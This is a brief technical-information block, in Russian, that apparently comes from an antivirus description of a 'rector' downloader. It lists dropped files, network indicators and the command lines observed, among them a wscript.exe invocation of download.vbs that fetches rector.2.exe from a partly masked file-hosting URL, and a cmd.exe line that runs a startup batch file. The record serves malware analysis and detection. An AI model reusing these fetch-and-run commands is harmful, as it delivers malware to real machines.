Техническая информация
- '%TEMP%\rector\2\rector.2.exe'
- '%TEMP%\rector\2\rector.2.exe' (загружен из сети Интернет)
- '<SYSTEM32>\wscript.exe' //nologo //b download.vbs http://dl.##opbox.com/u/109599801/programs/rector/v2/rector.2.exe rector.2.exe
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\rector.2.startup.bat" "
- %TEMP%\rector.2.exe
- %TEMP%\rector\2\rector.2.exe
- %TEMP%\download.vbs
- %TEMP%\1.tmp\rector.2.startup.bat
- %TEMP%\1.tmp\download.vbs
- %TEMP%\1.tmp\rector.2.startup.bat
- %TEMP%\1.tmp\download.vbs
- 'dl.##opbox.com':80
- dl.##opbox.com/u/109599801/programs/rector/v2/rector.2.exe
- DNS ASK dl.##opbox.com